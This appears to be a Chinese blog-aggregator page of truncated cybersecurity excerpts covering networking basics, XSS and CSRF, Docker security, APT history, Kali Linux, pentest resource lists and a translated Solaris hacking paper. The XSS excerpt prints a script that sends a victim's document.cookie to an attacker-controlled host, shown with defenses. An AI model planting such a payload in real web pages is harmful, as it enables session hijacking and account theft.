网络安全

计算机网络基础,网络协议,常见状态码

微笑、不失礼 提交于 2020-03-26 15:02:50
计算机的组成   存储器,运算器,控制器,输出/输出设备   输入-》存储-》控制-》存储-》运算-》输出   输入--运算--输出 ssh 协议:本地主机与远程服务器之间进行加密的数据传输 ssl 协议:信息安全加密协议 程序是由若干指令组成的 OSI七层参考模型   物理层   数据链路层 传输介质,单元为数据帧 作用:物理地址的定义,网络拓扑结构   网络层 为传输层提供服务,解决节点传输问题,解决网络互联问题   传输层 数据传输 单位是段 或者 报文 屏蔽下层   会话层 建立会话,管理会话   表示层 数据处理 数据压缩 数据加密   应用层 软件接口 协议:   tcp 面向连接,可靠,一对一 ,效率低   udp(用户数据报协议)不面向连接,不可靠,一对多,效率高 IP:网际协议,计算机之间的传输 HTTP:超文本传输 无连接,独立,无状态 FTP:文件传输协议 基于TCP协议 Telnet:远程控制协议 网络地址:   外网:     A类:1.0.0.1--126.255.255.255     B类:127.0.0.0--191.255.255.255     c类: 192.0.0.0--223.255.255.255   内网:     A类:10.0.0.0 -- 10.255.255.254     B类:172.16.0.1 -- 172.255

黑客通常在用这 4 种方式攻击你!(内附防御策略)

假如想象 提交于 2020-03-26 06:45:12
黑客通常在用这 4 种方式攻击你!(内附防御策略) XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户浏览器的信任。https://www.cnblogs.com/chengxy-nds/p/12217990.html 一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会被渲染成以下形式: <p><script>location.href="//domain.com/?c=" + document.cookie</script></p> 另一个用户浏览了含有这个内容的页面将会跳转到 domain.com 并携带了当前作用域的 Cookie。如果这个论坛网站通过 Cookie 管理用户登录状态,那么攻击者就可以通过这个 Cookie 登录被攻击者的账号了。 危害 窃取用户的 Cookie 伪造虚假的输入表单骗取个人信息 显示伪造的文章或者图片 防范手段 1. 设置 Cookie 为 HttpOnly 设置了 HttpOnly 的

你的 Docker 应用是安全的吗?

无人久伴 提交于 2020-03-25 09:26:11
近一年来,Docker 已经逐渐成为 container 界的事实标准,成为技术人员不可或缺的技能之一,就像 Docker 宣称的那样,「Build,Ship,and Run Any App,Anywhere」,容器极大简化了环境部署的步骤,并且很好的保证了环境的一致性。 Docker 的轻量级给云市场也注入了活力,国内已经有厂商发布了基于 Docker 的公有云服务,例如: 灵雀云 , DaoCloud 。 作为国内早期 Docker 的爱好者,笔者对 Docker 走向公有云的领域还是有些疑问的,熟悉 Docker 的人都知道,Docker 底层是共享内核的,没有物理隔离内核,会造成很大的安全问题,不知道国内的厂商是如何规避这个问题,做了哪些安全防护;但是国内有一支队伍,推出了自己的轻量级的虚拟化服务 Hyper ,一种类似 Docker 的方式,但是解决的 Docker 共享内核的问题,并且在2015的东京举办的 OpenStack 大会上,带去了自己的 Hypernetes ,一个真正多租户的 Kubernetes Distro,有兴趣的朋友可以进一步了解。 笔者觉得 Docker 共享内核级别的安全,用到的人毕竟是少数,作为应用开发者,我们更关心的是跑在 Docker 中的应用是否安全,是否受到 XSS 攻击,SQL 注入攻击之类,OneAPM 公司的 OneRASP

作为一名白帽子Hacker,如何打造自己的网络安全军火库?

我只是一个虾纸丫 提交于 2020-03-24 05:21:49
俗话说:“ 工欲善其事,必先利其器 ”。 对于白帽子Hacker而言,装备 / 工具 / 软件等资源集合就好比我们的「 军火库 」,是否 配备完善且得心顺手 ,直接决定了后续战斗中能否 更快更准 拿下目标。 作为一名 资深工具控 和 强迫症患者 ,我在这里不仅提供工具清单,还想跟你分享: 如何定义一款好的工具? 在不同发展阶段,应该选择怎么样的工作装备? 在不同工作阶段,有哪些必备的“神兵利器”? 知识管理方法论,为何能够升级我们的“军火库”? 接下来,我们将围绕下面这张图展开 => 我想告诉大家,如何通过 工作装备、安全测试、知识管理 等 3 大类工具来武装自己,打造属于自己的「 网络安全军火库 」。 1. 工作装备类 工作装备指的是电脑、硬盘、显示屏等硬件设备,这些代表着我们 计算、存储、显示 等硬件资源的上限。在我看来,这套装备的好坏,直接决定了整个军火库的 输出火力 ,其重要性不言而喻。 如果我们刚入门学习,采用一台普通电脑这样「 All in One 」的策略,前期完全没问题。而随着学习和工作的逐渐深入,会有以下这些情况陆续出现: 电脑正在进行密码爆破等工作,CPU 指数爆满干不了其他活儿… 虚拟环境用着用着,体积从原先安装的 10G 到现在 50G… 对目标站点进行测试时,边测边查资料时,需要频繁切换窗口… 项目资料既多又杂,跟个人和学习资料混在一起…

美APT发展

女生的网名这么多〃 提交于 2020-03-24 03:16:51
1、五眼联盟 澳大利亚、加拿大、新西兰、英国、美国 5个国家情报共享 2、以色列 不容忽视的网络安全盟友:以色列 在美国的扶持下,以色列有着高度发展的网络安全产业链,甚至怀疑以色列就是美国的网络武器库生产基地 3、工控威胁 2009年震网(STUXNET),破坏核设施。 2010年FLAME(火焰病毒) ,高复杂度,全平台。 2011年DUQU*** ,情报收集为主,工控。 一些为大家所知的工控威胁恶意软件,定制化高复杂度。 4、消失的几年 #2011年,移动平台成为恶意软件热点(WARRIOR PRIDE)。 #2012年,Regin(NSA2008?) #2013年,勒索软件 #2014年,mac OS平台恶意软件 #2012-2014无文件***(内存注册表powershell) 在4年里,大家几乎看不到来自美国的***组织信息,只能看看这几年出现的恶意***热点。 5、方程式 2015年Equation Drug (方程式组织)针对防火墙。 被影子经纪人爆料,可以看到恶意软件的***方向不是PC,而是对应的电信设备。 #2016年挖矿软件,IOT物联网 6、 CIA(VAULT7) 2017年VAULT7(CIA)包括摄像头等全平台工具套件 。 这次***套件的放出,更是证明了美国的网络武器库已经不是简单的服务器和PC主机,他瞄准的的整个IOT

黑客专用操作系统——Kali Linux简介

北战南征 提交于 2020-03-23 21:47:38
1如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品,从Kali开始,BackTrack将成为历史。 如果您没接触过BackTrack也没关系,我们从头开始了解Kali Linux。 按照官方网站的定义,Kali Linux是一个高级渗透测试和安全审计Linux发行版。作为使用者,我简单的把它理解为,一个特殊的Linux发行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用。也可称之为平台或者框架。 Kali Linux 作为Linux发行版,Kali Linux是在BackTrack Linux的基础上,遵循Debian开发标准,进行了完全重建。并且设计成单用户登录,root权限,默认禁用网络服务。 上图是安装完Kali Linux系统自带的工具集。最顶层是十佳安全工具,这些工具都被包含在下面的工具分类中。 Kali Linux将所带的工具集划分为十四个大类,这些大类中,很多工具是重复出现的,因为这些工具同时具有多种功能,比如nmap既能作为信息搜集工具也能作为漏洞探测工具。其中大部分工具的使用,都会在之后的章节中做介绍和实例演示。另外,这里介绍的工具都是系统默认推荐的工具,我们也可以自行添加新的工具源,丰富工具集。根据笔者的经验,绝大多数情况下,系统推荐的工具已经足够使用了

远程办公,没那么简单!天地和兴重磅送上网络安全警示与最佳实践

北城以北 提交于 2020-03-23 18:33:22
【编者按】 当前新型冠状病毒全球传播形势严峻复杂,越来越多的公司采取了远程办公模式。尽管远程办公措施可平衡业务生产力与员工的安全健康,但是却很容易忽略公司网络及数据的安全性。对许多公司而言,这是他们第一次启用远程办公模式,这意味着多数企业很可能没有适当的协议或指南来帮助确保其信息和设备避免遭受网络威胁。与此同时,各种威胁行为者已开始利用对新型冠状病毒的恐慌,大量投递Emotet、AZORult、AgentTesla Keylogger和NanoCore等***,通过新型冠状病毒为主题的钓鱼***活动窃取用户凭据,控制受害网络,传播勒索软件。近日,信安标委已发布《网络安全标准实践指南—远程办公安全防护》,国内网络安全厂商(安天、奇安信等)也相继发布相关远程办公网络安全防护方案与实践。对此,美国国土安全部下属CISA发布有关当前特殊形势下网络安全警示与最佳实践,涵盖口令管理器、双因素认证、端点保护软件、设备物理安全、公共或不安全Wi-Fi、***应用、安全礼仪、网络钓鱼***等诸多方面,具备较强的可操作性和指导性。 使用口令管理器 口令管理器是确保公司团队所有在线帐户和口令安全的好方法。LastPass、1Password、Keepass、Keeper、Dashlane、mSecure、Passwordsafe等为最流行且口碑较好的口令管理系统,用于在线存储加密口令

一网打尽!每个程序猿都该了解的黑客技术大汇总

混江龙づ霸主 提交于 2020-03-23 10:28:22
目录 [一网打尽!每个程序猿都该了解的黑客技术大汇总](https://www.cnblogs.com/xuanyuan/p/12529598.html) 网络安全 SQL注入 XSS攻击 反射型 存储型 CSRF攻击 DDoS攻击 DNS劫持 TCP劫持 端口扫描技术 系统安全 栈溢出攻击 整数溢出攻击 空指针攻击 释放后使用攻击 HOOK 权限提升 可信计算 密码学 对称加密 & 非对称加密 秘钥交换技术 信息摘要算法 数据编码技术 多因子认证技术 总结 一网打尽!每个程序猿都该了解的黑客技术大汇总 上面这个段子估计很多朋友都看过,程序员被黑过无数次,在其他人眼中,仿佛我们需要写得了木马,翻得了围墙,修得了电脑,找得到资源,但凡是跟计算机沾点边的,咱都得会才行。 段子归段子,言归正传,对于咱们程序员来说,多多少少了解一些信息安全的技术知识还是大有裨益的,不仅能了解一些计算机和网络的底层原理,也能反哺我们的开发工作,带着安全思维编程,减少漏洞的产生。 本文内容: - 网络安全 - SQL注入 - XSS攻击 - CSRF攻击 - DDoS攻击 - DNS劫持 - TCP劫持 - 端口扫描技术 - 系统安全 - 栈溢出攻击 - 整数溢出攻击 - 空指针攻击 - 释放后使用攻击 - HOOK - 权限提升 - 可信计算 - 密码学 - 对称加密 & 非对称加密 - 秘钥交换技术 -

国外整理的一套在线渗透测试资源合集

五迷三道 提交于 2020-03-23 07:58:11
3 月,跳不动了?>>> http://bobao.360.cn/news/detail/1132.html 在线资源 渗透测试资源 Metasploit Unleashed - 免费的metasploit教程 PTES - 渗透测试执行标准 OWASP - 开放式Web应用程序安全项目 OSSTMM - 开源安全测试方法手册 Shell 脚本资源 LSST - linux shell脚本教程 Linux 资源 Kernelnewbies - 一个出色的Linux内核资源的社区 Shellcode 开发 Shellcode Tutorials - 如何编写shellcode的教程 Shellcode examples - Shellcodes 的库 社工资源 Social Engineering Framework - 一些社工的资源 开锁资源 Schuyler Towne channel - 开锁视频和安全沙龙 工具 渗透测试系统版本 Kali - 一个Linux发行版,用来做数字取证和渗透测试。 NST - 网络安全工具包发行版 Pentoo - 着眼于安全的基于Gentoo的 LiveCD BackBox - 基于Ubuntu的发行版,用于渗透测试及安全评估 渗透测试基础工具 Metasploit - 应用最广的渗透测试软件 Burp - 抓包工具,针对Web应用执行安全检测

How hacker do IT: Tricks Tools and Techniques (翻译)

生来就可爱ヽ(ⅴ<●) 提交于 2020-03-23 00:08:41
本资料是 Alex Noordergraaf 企业产品的说明书 现在整理如下: 第一部分: How hackers Do It : Tricks Tools and Techniques 本文介绍了黑客用来获取的技巧,工具和技术未经授权访问Solaris™Operating Environment(Solaris OE)系统。具有讽刺意味的是,它通常是黑客成功获取的最基本方法访问您的系统。对于本文,我们使用Solaris OE系统的默认配置进行评估哪些漏洞对入侵者最具吸引力。 使用容易获得免费软件安全工具,我们演示了黑客用来攻击的技术系统。本文中描述的所有攻击都有预防性解决方案;但是,黑客每天都会使用这些攻击来破坏系统。 意识到如何执行这些攻击,你可以提高你的意识组织建立和维护安全系统的重要性。许多组织只在错误期间解决安全问题安装,然后再也不会重新访问它。 维护安全是一个持续的过程,它是必须定期审查和重新审视的事情。使用本文中的信息,您可以尝试入侵您的组织数据中心,高端服务器或其他系统,以确定基本攻击的位置成功。 然后,您可以解决安全漏洞,以防止未经授权的用户 从攻击系统。 下面 我将删减合理的技术文档资料整理: 端口扫描: 端口扫描程序可能是Internet上最常用的扫描工具。这些工具扫描大型IP空间并报告它们遇到的系统端口可用,以及其他信息,例如操作系统类型。